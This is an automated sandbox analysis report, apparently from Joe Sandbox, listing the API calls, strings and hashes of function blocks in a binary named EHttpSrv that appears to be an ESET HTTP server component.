                                                                                                                • Instruction Fuzzy Hash: 0B71A1B06043009BC320CFA5CD81B5BF7E4AF94A48F40CA2DF999D7391E73DD9958A52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026#776$#2310#2311#314#5149#5398#6751
                                                                                                                • String ID: "%s"
                                                                                                                • API String ID: 349887472-3297466227
                                                                                                                • Opcode ID: a16b56dffb77aa759c24ceb2f07e91822a11aa3424924b61ba93bdb9948eb8f5
                                                                                                                • Instruction ID: d2cfaa41a95424281d7d24f1a67dfd6e071f8f898d974065d71e4609338fcf78
                                                                                                                • Opcode Fuzzy Hash: a16b56dffb77aa759c24ceb2f07e91822a11aa3424924b61ba93bdb9948eb8f5
                                                                                                                • Instruction Fuzzy Hash: CE518B71A087019BE310CFA6CC89B5BB7A4FB44319F00CA2DFA46572D1DA79A904DB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045BF06
                                                                                                                • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,00070007,ESET_RootSslCert,00000000), ref: 2045BF4C
                                                                                                                • #310.MFC80U ref: 2045BF6A
                                                                                                                • #310.MFC80U ref: 2045BF78
                                                                                                                • #4026.MFC80U(00000217), ref: 2045BF8A
                                                                                                                • #4026.MFC80U(00000216), ref: 2045BF98
                                                                                                                • #4098.MFC80U(?,?,00000030), ref: 2045BFAA
                                                                                                                • #578.MFC80U(?,?,00000030), ref: 2045BFB5
                                                                                                                • #578.MFC80U ref: 2045BFC2
                                                                                                                • memset.MSVCR80 ref: 2045BFFA
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2045C088
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578$#314#4098#6751CertCertificateFindStorememset
                                                                                                                • String ID: ESET_RootSslCert$H$Root
                                                                                                                • API String ID: 91189364-3528139168
                                                                                                                • Opcode ID: 0678abf56a7a3d1e0d72c8b167023fc8ff6b7b06c889aa8113efb5d68817ad2b
                                                                                                                • Instruction ID: 50884617386e7d724cd1282ccc776c095777ed97c0775213a395e720bce9dbe1
                                                                                                                • Opcode Fuzzy Hash: 0678abf56a7a3d1e0d72c8b167023fc8ff6b7b06c889aa8113efb5d68817ad2b
                                                                                                                • Instruction Fuzzy Hash: 9A514A70945609EFCB10DFE4CD89BEEBBB4AB18B05F20C229E501B72D0DB795A05DB60
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 20424095
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 204240A2
                                                                                                                • #4026.MFC80U(000000C5), ref: 204240BA
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 204240D2
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 2042410D
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 2042413D
                                                                                                                • #6063.MFC80U(20485878), ref: 2042414E
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 2042415E
                                                                                                                • #310.MFC80U ref: 2042416C
                                                                                                                • #2311.MFC80U(?,2048587C,000000FF), ref: 20424188
                                                                                                                • #6063.MFC80U(?), ref: 2042419C
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 204241E7
                                                                                                                • #6063.MFC80U(20485878), ref: 204241F8
                                                                                                                • #578.MFC80U ref: 20424209
                                                                                                                • #578.MFC80U ref: 20424222
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20424256
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#6063$#310#578$#2311#4026#4574
                                                                                                                • String ID:
                                                                                                                • API String ID: 41856079-0
                                                                                                                • Opcode ID: 1edb12446993ca98173a7668d1f0b0277ab47e324ba7c68fac4df549d923e01e
                                                                                                                • Instruction ID: 687126907702a7e443bdc3775094fafe2b3e18f5a04f559aed56f15db4042a3c
                                                                                                                • Opcode Fuzzy Hash: 1edb12446993ca98173a7668d1f0b0277ab47e324ba7c68fac4df549d923e01e
                                                                                                                • Instruction Fuzzy Hash: 3D5123316086459FD724CF60CC84FAB77A9FB94309F40CA2CF945576E0DB799904CB52
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(000003E8,?,?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478BEE
                                                                                                                • InterlockedCompareExchange.KERNEL32(204A57F4,?,00000000), ref: 20478BF7
                                                                                                                • _amsg_exit.MSVCR80 ref: 20478C15
                                                                                                                • _initterm_e.MSVCR80 ref: 20478C30
                                                                                                                • _initterm.MSVCR80 ref: 20478C4C
                                                                                                                • InterlockedExchange.KERNEL32(204A57F4,00000000), ref: 20478C61
                                                                                                                • Sleep.KERNEL32(000003E8,?,?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478CB2
                                                                                                                • InterlockedCompareExchange.KERNEL32(204A57F4,00000001,00000000), ref: 20478CBC
                                                                                                                • _amsg_exit.MSVCR80 ref: 20478CCE
                                                                                                                • _decode_pointer.MSVCR80(?,?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478CE2
                                                                                                                • _decode_pointer.MSVCR80(?,00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478CF1
                                                                                                                • _encoded_null.MSVCR80(00000001,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478D03
                                                                                                                • _decode_pointer.MSVCR80(?,?,20478DBB,00000001,?,?,20498100,00000010,20478E87,?), ref: 20478D13
                                                                                                                • free.MSVCR80 ref: 20478D20
                                                                                                                • _encoded_null.MSVCR80(?,20498100,00000010,20478E87,?), ref: 20478D27
                                                                                                                • InterlockedExchange.KERNEL32(204A57F4,00000000), ref: 20478D44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExchangeInterlocked$_decode_pointer$CompareSleep_amsg_exit_encoded_null$_initterm_initterm_efree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2174737765-0
                                                                                                                • Opcode ID: e17a9ff4fe9a01e9f66dbe4c43903dcfb7005e81e7626672a228798f566fa08a
                                                                                                                • Instruction ID: 182727d0421b49ffdac12668d794a1d59ea721c2da4f447e0c6feb1164b7796b
                                                                                                                • Opcode Fuzzy Hash: e17a9ff4fe9a01e9f66dbe4c43903dcfb7005e81e7626672a228798f566fa08a
                                                                                                                • Instruction Fuzzy Hash: E641C175549601EFD2119FA0CD84EA97BB5EB1470AF20C82EF901966B2CF7C9C44EAA1
                                                                                                                APIs
                                                                                                                • #4574.MFC80U ref: 204601A5
                                                                                                                • GetClientRect.USER32(?,?), ref: 204601B3
                                                                                                                • #2651.MFC80U(000004C6,0000000F), ref: 204601E4
                                                                                                                  • Part of subcall function 2045D0A0: GetParent.USER32(?), ref: 2045D0B0
                                                                                                                  • Part of subcall function 2045D0A0: #2366.MFC80U(00000000), ref: 2045D0B7
                                                                                                                  • Part of subcall function 2045D0A0: #4109.MFC80U(00000000,02000000,00000000), ref: 2045D0D7
                                                                                                                  • Part of subcall function 2045D0A0: GetClientRect.USER32(?,?), ref: 2045D0F1
                                                                                                                  • Part of subcall function 2045D0A0: GetWindowRect.USER32(?,00000000), ref: 2045D116
                                                                                                                  • Part of subcall function 2045D0A0: #5609.MFC80U(00000000), ref: 2045D123
                                                                                                                  • Part of subcall function 2045D0A0: malloc.MSVCR80 ref: 2045D12A
                                                                                                                  • Part of subcall function 2045D0A0: #5713.MFC80U(?,00000000), ref: 2045D177
                                                                                                                • #2651.MFC80U(00000428,00000009,000004C6,0000000F), ref: 204601F9
                                                                                                                • #2651.MFC80U(00000499,00000009,00000428,00000009,000004C6,0000000F), ref: 2046020E
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 2046023C
                                                                                                                • #2364.MFC80U(00000000), ref: 2046023F
                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 20460254
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 20460268
                                                                                                                • #3869.MFC80U(00000000,20485878,00000000,00000019,000000FF), ref: 2046027F
                                                                                                                • #3869.MFC80U(00000001,20486940,00000000,000000C8,000000FF,00000000,20485878,00000000,00000019,000000FF), ref: 20460296
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 204602AB
                                                                                                                • #2651.MFC80U(00000428,00000000), ref: 204602BF
                                                                                                                • #2155.MFC80U(00000428,00000000), ref: 204602C6
                                                                                                                • #2651.MFC80U(00000499,00000000,00000428,00000000), ref: 204602D4
                                                                                                                • #2155.MFC80U(00000499,00000000,00000428,00000000), ref: 204602DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651$MessageSend$Rect$#2155#3869Client$#2364#2366#4109#4574#5609#5713ParentWindowmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1725614514-0
                                                                                                                • Opcode ID: b4f2627a347d5a81c19f3b90ed9b67b099448da426e5a52dbe35c8c8a3e56190
                                                                                                                • Instruction ID: 8bc0d5fc76cd60e7e419bd58047b3fc9abc88ffc0ab25ff98c7cafe0d2c59eeb
                                                                                                                • Opcode Fuzzy Hash: b4f2627a347d5a81c19f3b90ed9b67b099448da426e5a52dbe35c8c8a3e56190
                                                                                                                • Instruction Fuzzy Hash: 2D31E6703803057BE62897B48C87FEEB699AB54F08F40C61CB3586B6D0DFA8BC458794
                                                                                                                APIs
                                                                                                                • #2651.MFC80U(000003EE,00000000,?,?), ref: 2045B719
                                                                                                                • #2155.MFC80U(000003EE,00000000,?,?), ref: 2045B720
                                                                                                                • #2651.MFC80U(000004C6,00000000,000003EE,00000000,?,?), ref: 2045B72D
                                                                                                                • #2155.MFC80U(000004C6,00000000,000003EE,00000000,?,?), ref: 2045B734
                                                                                                                • #2651.MFC80U(000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B745
                                                                                                                • #2155.MFC80U(000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B74C
                                                                                                                • #2651.MFC80U(000004F9,00000000,000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B759
                                                                                                                • #2155.MFC80U(000004F9,00000000,000003F7,00000000,000004C6,00000000,000003EE,00000000,?,?), ref: 2045B760
                                                                                                                • #2651.MFC80U(000004F9,?,000004C6,00000000), ref: 2045B778
                                                                                                                • #2651.MFC80U(000003F7,000004F9,?,000004C6,00000000), ref: 2045B78A
                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 2045B7B1
                                                                                                                • #2860.MFC80U(00000000,?,?,000004C6,00000000), ref: 2045B7D5
                                                                                                                • #2155.MFC80U(00000001,?,000004C6,00000000), ref: 2045B813
                                                                                                                • #2155.MFC80U(00000000,00000001,?,000004C6,00000000), ref: 2045B823
                                                                                                                • #2155.MFC80U(00000000,?,000004C6,00000000), ref: 2045B832
                                                                                                                • #2155.MFC80U(00000000,00000000,?,000004C6,00000000), ref: 2045B83E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155$#2651$#2860MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1451778098-0
                                                                                                                • Opcode ID: ce393c04e2335226a34f455cef0e272eb4f0d1c9f16b51af7167b89965d3b120
                                                                                                                • Instruction ID: 67a8ca9e0ab85399b09c8d6d91a4dc5d329e4d14118fc57435a7ce78afcd73f5
                                                                                                                • Opcode Fuzzy Hash: ce393c04e2335226a34f455cef0e272eb4f0d1c9f16b51af7167b89965d3b120
                                                                                                                • Instruction Fuzzy Hash: 1131C5713846019BDA01ABA48856BBE77BADBE0F08F40C53CF5464B7E0CE7C990AC752
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20402090: _wcsicmp.MSVCR80 ref: 204020FE
                                                                                                                • #1176.MFC80U(?,?,?,?,?,?,?,?,?,?,?,00000000,ADAPTER_NAME,?,?,?), ref: 2040E29E
                                                                                                                  • Part of subcall function 20401EC0: _wcsicmp.MSVCR80 ref: 20401F2E
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C964
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C974
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C990
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9AC
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9C8
                                                                                                                  • Part of subcall function 2040C930: #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$_wcsicmp$#1176
                                                                                                                • String ID: ($ADAPTER$ADAPTERS$ADAPTER_NAME$ADDRESS$ADDRESSES_DNS$ADDRESSES_MULTICAST$ADDRESSES_UNICAST$IP6_ADDR$IP_ADDR$NAME$SUBNET_MASK
                                                                                                                • API String ID: 1024906901-1100604650
                                                                                                                • Opcode ID: d62074c8ca693871cca77507b0ef0936bf118cca2e6a1637b2bf2ea5ef87f241
                                                                                                                • Instruction ID: aca5af3c6637ef0e943cc87965f3c7281b4ae4fd47ceedf4ca17f81ce8ee28a1
                                                                                                                • Opcode Fuzzy Hash: d62074c8ca693871cca77507b0ef0936bf118cca2e6a1637b2bf2ea5ef87f241
                                                                                                                • Instruction Fuzzy Hash: 18D1A6B14153449BC314DB95CC81FAFB3EABBD4608F408E3DF989A6241E73DA6098B53
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CEAD
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CEF9
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CF39
                                                                                                                  • Part of subcall function 2043CE80: wcscpy_s.MSVCR80 ref: 2043CF98
                                                                                                                  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2045009D
                                                                                                                • wcscpy_s.MSVCR80 ref: 204500E5
                                                                                                                • wcsncpy_s.MSVCR80 ref: 20450103
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20450140
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 2045014B
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,0000000E), ref: 2045016F
                                                                                                                • wcsncmp.MSVCR80 ref: 20450190
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 2045020D
                                                                                                                • RegEnumKeyW.ADVAPI32(?,-00000001,?,0000000E), ref: 20450238
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20450250
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 20450261
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 20450268
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$Close$CriticalSection$EnumLeave$EnterOpenwcsncmpwcsncpy_s
                                                                                                                • String ID: Node_
                                                                                                                • API String ID: 1802429796-3995354651
                                                                                                                • Opcode ID: d14b8de77c63ef39d49a351c681705719c90754a08a61d834a833efde99d88db
                                                                                                                • Instruction ID: bc35a6ce19b864aa4decf253173c78be40daf2bb1fb0ca7fd91c94ece76f0322
                                                                                                                • Opcode Fuzzy Hash: d14b8de77c63ef39d49a351c681705719c90754a08a61d834a833efde99d88db
                                                                                                                • Instruction Fuzzy Hash: 0B61A1B5108704ABD714DFA4CC85BABB7E8BF9C708F108D1CF99597241DA39EA098B52
                                                                                                                APIs
                                                                                                                • #764.MFC80U(FF9A6AE8,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C662
                                                                                                                • #764.MFC80U(458BFFF9,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C67B
                                                                                                                • #764.MFC80U(CCCCCCCC,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C694
                                                                                                                • #764.MFC80U(83F0458B,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C6AD
                                                                                                                • #764.MFC80U(FFF99779,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C6C6
                                                                                                                • qsort.MSVCR80 ref: 2041C6FB
                                                                                                                • qsort.MSVCR80 ref: 2041C756
                                                                                                                • qsort.MSVCR80 ref: 2041C77C
                                                                                                                • qsort.MSVCR80 ref: 2041C7A4
                                                                                                                • qsort.MSVCR80 ref: 2041C7F4
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C826
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C893
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,00000000,00000001,?,?,?,00000000,2047EED7,000000FF), ref: 2041C8F3
                                                                                                                • wcscpy_s.MSVCR80 ref: 2041C94E
                                                                                                                • wcsncpy_s.MSVCR80 ref: 2041C95F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764qsort$#265$wcscpy_swcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2630380505-0
                                                                                                                • Opcode ID: 527e4a909f8d4ab2249d358f0f897bcfc00e09c81ee43996ef5b6378b076cdce
                                                                                                                • Instruction ID: 7d6139fbdda4d1cc13a014d33e862f6533b6a53d91e9fdf6e56a956c0eee08b0
                                                                                                                • Opcode Fuzzy Hash: 527e4a909f8d4ab2249d358f0f897bcfc00e09c81ee43996ef5b6378b076cdce
                                                                                                                • Instruction Fuzzy Hash: DCD18AB19003088BCB14CF69CC81A9AFBE5FF98304F548A1EED559B361D7B9E945CB81
                                                                                                                APIs
                                                                                                                • #776.MFC80U(?,FEEA6C22,00000000,?,?,00000000), ref: 204464AA
                                                                                                                • #4026.MFC80U(?,?,?,00000000), ref: 20446504
                                                                                                                • #4026.MFC80U(?,?,?,?,00000000), ref: 2044651E
                                                                                                                • memset.MSVCR80 ref: 2044654F
                                                                                                                • free.MSVCR80 ref: 2044655C
                                                                                                                • #5149.MFC80U(00000080,?,?,?,00000000), ref: 20446590
                                                                                                                • #5398.MFC80U(000000FF,00000080,?,?,?,00000000), ref: 204465B0
                                                                                                                • #774.MFC80U(?,?,?,?,00000000), ref: 204465D0
                                                                                                                • #4026.MFC80U(000001D2,?,?,?,00000000), ref: 204465E1
                                                                                                                • #762.MFC80U(0000044C,?,?,?,00000000), ref: 204465EC
                                                                                                                • memset.MSVCR80 ref: 20446654
                                                                                                                • free.MSVCR80 ref: 20446661
                                                                                                                • #2461.MFC80U(?,?,?,00000000,?,?,?,?,00000000), ref: 204466DA
                                                                                                                • #774.MFC80U ref: 20446707
                                                                                                                • #774.MFC80U(?), ref: 20446714
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026#774$freememset$#2461#5149#5398#762#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 581628281-0
                                                                                                                • Opcode ID: 98a892b8d0df8cd6ef370fa9880814b123266298d9cd77d375af763eb087fec2
